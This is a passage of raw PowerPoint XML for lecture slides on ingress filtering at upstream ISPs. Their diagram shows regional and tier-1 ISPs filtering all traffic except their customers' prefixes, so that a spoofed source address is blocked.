          <p:cNvPr id="13315" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="635000" y="838200"/>
            <a:ext cx="11422063" cy="1046163"/>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Ingress Filtering: Upstream ISP (3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13316" name="Freeform 3"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3752850" y="2481263"/>
            <a:ext cx="2909888" cy="291465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3317" name="Freeform 4"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3490913" y="6154738"/>
            <a:ext cx="2909887" cy="291465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3318" name="Freeform 5"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7500938" y="2819400"/>
            <a:ext cx="4173537" cy="641032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3319" name="Freeform 6"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1549400" y="2133600"/>
            <a:ext cx="1535113" cy="131921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3320" name="Freeform 7"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1549400" y="3775075"/>
            <a:ext cx="1414463" cy="131921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3321" name="Freeform 8"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1701800" y="5645150"/>
            <a:ext cx="1357313" cy="131762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3322" name="Freeform 9"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1701800" y="7400925"/>
            <a:ext cx="1446213" cy="131921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3323" name="Line 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3049588" y="2819400"/>
            <a:ext cx="738187" cy="441325"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13324" name="Line 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2909888" y="4049713"/>
            <a:ext cx="896937" cy="404812"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13325" name="Line 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3032125" y="6335713"/>
            <a:ext cx="509588" cy="438150"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13326" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="3101975" y="7827963"/>
            <a:ext cx="474663" cy="282575"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13327" name="Line 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6197600" y="7388225"/>
            <a:ext cx="2492375" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13328" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1340328" y="2354263"/>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a:t>12.12.0.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13329" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1338741" y="3995738"/>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a:t>34.34.0.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13330" name="Text Box 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1460185" y="5822950"/>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a:t>56.56.0.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13331" name="Text Box 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1410178" y="7758113"/>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a:t>78.78.0.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13332" name="Group 19"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5834063" y="4000500"/>
            <a:ext cx="565150" cy="230188"/>
            <a:chOff x="533" y="321"/>
            <a:chExt cx="359" cy="180"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="13390" name="Group 20"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="533" y="321"/>
              <a:ext cx="359" cy="180"/>
              <a:chOff x="1009" y="655"/>
              <a:chExt cx="359" cy="180"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="13392" name="Oval 21"/>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3393" name="Line 22"/>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3394" name="Line 23"/>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3395" name="Rectangle 24"/>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3396" name="Oval 25"/>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3397" name="Group 26"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="1095" y="681"/>
                <a:ext cx="176" cy="68"/>
                <a:chOff x="2848" y="848"/>
                <a:chExt cx="140" cy="98"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="13402" name="Line 2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3403" name="Line 2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3404" name="Line 2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3398" name="Group 30"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="1095" y="680"/>
                <a:ext cx="176" cy="68"/>
                <a:chOff x="2848" y="848"/>
                <a:chExt cx="140" cy="98"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="13399" name="Line 3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3400" name="Line 3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3401" name="Line 3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3391" name="Line 34"/>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3333" name="Group 35"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7758113" y="4025900"/>
            <a:ext cx="563562" cy="230188"/>
            <a:chOff x="533" y="321"/>
            <a:chExt cx="359" cy="180"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="13375" name="Group 36"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="533" y="321"/>
              <a:ext cx="359" cy="180"/>
              <a:chOff x="1009" y="655"/>
              <a:chExt cx="359" cy="180"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="13377" name="Oval 37"/>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3378" name="Line 38"/>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3379" name="Line 39"/>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3380" name="Rectangle 40"/>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3381" name="Oval 41"/>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3382" name="Group 42"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="1095" y="681"/>
                <a:ext cx="176" cy="68"/>
                <a:chOff x="2848" y="848"/>
                <a:chExt cx="140" cy="98"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="13387" name="Line 4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3388" name="Line 4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3389" name="Line 4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3383" name="Group 46"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="1095" y="680"/>
                <a:ext cx="176" cy="68"/>
                <a:chOff x="2848" y="848"/>
                <a:chExt cx="140" cy="98"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="13384" name="Line 4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3385" name="Line 4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3386" name="Line 4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3376" name="Line 50"/>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3334" name="Group 51"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5664200" y="7294563"/>
            <a:ext cx="565150" cy="230187"/>
            <a:chOff x="533" y="321"/>
            <a:chExt cx="359" cy="180"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="13360" name="Group 52"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="533" y="321"/>
              <a:ext cx="359" cy="180"/>
              <a:chOff x="1009" y="655"/>
              <a:chExt cx="359" cy="180"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="13362" name="Oval 53"/>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3363" name="Line 54"/>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3364" name="Line 55"/>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3365" name="Rectangle 56"/>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3366" name="Oval 57"/>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3367" name="Group 58"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="1095" y="681"/>
                <a:ext cx="176" cy="68"/>
                <a:chOff x="2848" y="848"/>
                <a:chExt cx="140" cy="98"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="13372" name="Line 5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3373" name="Line 6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3374" name="Line 6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3368" name="Group 62"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="1095" y="680"/>
                <a:ext cx="176" cy="68"/>
                <a:chOff x="2848" y="848"/>
                <a:chExt cx="140" cy="98"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="13369" name="Line 6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3370" name="Line 6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3371" name="Line 6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3361" name="Line 66"/>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3335" name="Group 67"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="8651875" y="7292975"/>
            <a:ext cx="565150" cy="230188"/>
            <a:chOff x="533" y="321"/>
            <a:chExt cx="359" cy="180"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="13345" name="Group 68"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="533" y="321"/>
              <a:ext cx="359" cy="180"/>
              <a:chOff x="1009" y="655"/>
              <a:chExt cx="359" cy="180"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="13347" name="Oval 69"/>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3348" name="Line 70"/>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3349" name="Line 71"/>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3350" name="Rectangle 72"/>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3351" name="Oval 73"/>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3352" name="Group 74"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="1095" y="681"/>
                <a:ext cx="176" cy="68"/>
                <a:chOff x="2848" y="848"/>
                <a:chExt cx="140" cy="98"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="13357" name="Line 7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3358" name="Line 7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3359" name="Line 7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3353" name="Group 78"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="1095" y="680"/>
                <a:ext cx="176" cy="68"/>
                <a:chOff x="2848" y="848"/>
                <a:chExt cx="140" cy="98"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="13354" name="Line 7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3355" name="Line 8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3356" name="Line 8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3346" name="Line 82"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="13336" name="Line 83"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6423025" y="4102100"/>
            <a:ext cx="1373188" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13337" name="AutoShape 84"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8148638" y="2452688"/>
            <a:ext cx="2316162" cy="1233487"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -46111"/>
              <a:gd name="adj2" fmla="val 64079"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF00FF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Filter all but </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>12.12.0.0/24 and 34.34.0.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13338" name="AutoShape 85"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8891588" y="5726113"/>
            <a:ext cx="2411412" cy="1235075"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -46111"/>
              <a:gd name="adj2" fmla="val 64079"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF00FF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Filter all but </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>56.56.0.0/24 and 78.78.0.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13339" name="Text Box 86"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6332538" y="3411538"/>
            <a:ext cx="1201737" cy="439737"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>56.56.1.1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13340" name="Line 87"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7583488" y="3594100"/>
            <a:ext cx="298450" cy="0"/>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13341" name="Text Box 88"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4149725" y="2968625"/>
            <a:ext cx="1325563" cy="1485900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2300"/>
              <a:t>regional</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2300"/>
              <a:t>ISP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13342" name="Text Box 89"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3803650" y="6840538"/>
            <a:ext cx="1325563" cy="1485900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2300"/>
              <a:t>regional</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2300"/>
              <a:t>ISP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13343" name="Text Box 90"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8609013" y="4835525"/>
            <a:ext cx="1485900" cy="531813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600"/>
              <a:t>tier-1 ISP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13344" name="Text Box 91"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7691438" y="3224213"/>
            <a:ext cx="531812" cy="777875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x</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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12353925" y="9428163"/>
            <a:ext cx="650875" cy="325437"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{307176C5-5D23-4050-A398-D3C00C195451}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14339" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="635000" y="914400"/>
            <a:ext cx="11422063" cy="893763"/>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Ingress Filtering: Upstream ISP (4)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340" name="Freeform 3"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3090863" y="2438400"/>
            <a:ext cx="2909887" cy="291465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4341" name="Freeform 4"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2828925" y="6111875"/>
            <a:ext cx="2909888" cy="291465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4342" name="Freeform 5"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6838950" y="2776538"/>
            <a:ext cx="4173538" cy="641032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4343" name="Freeform 6"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="863600" y="2090738"/>
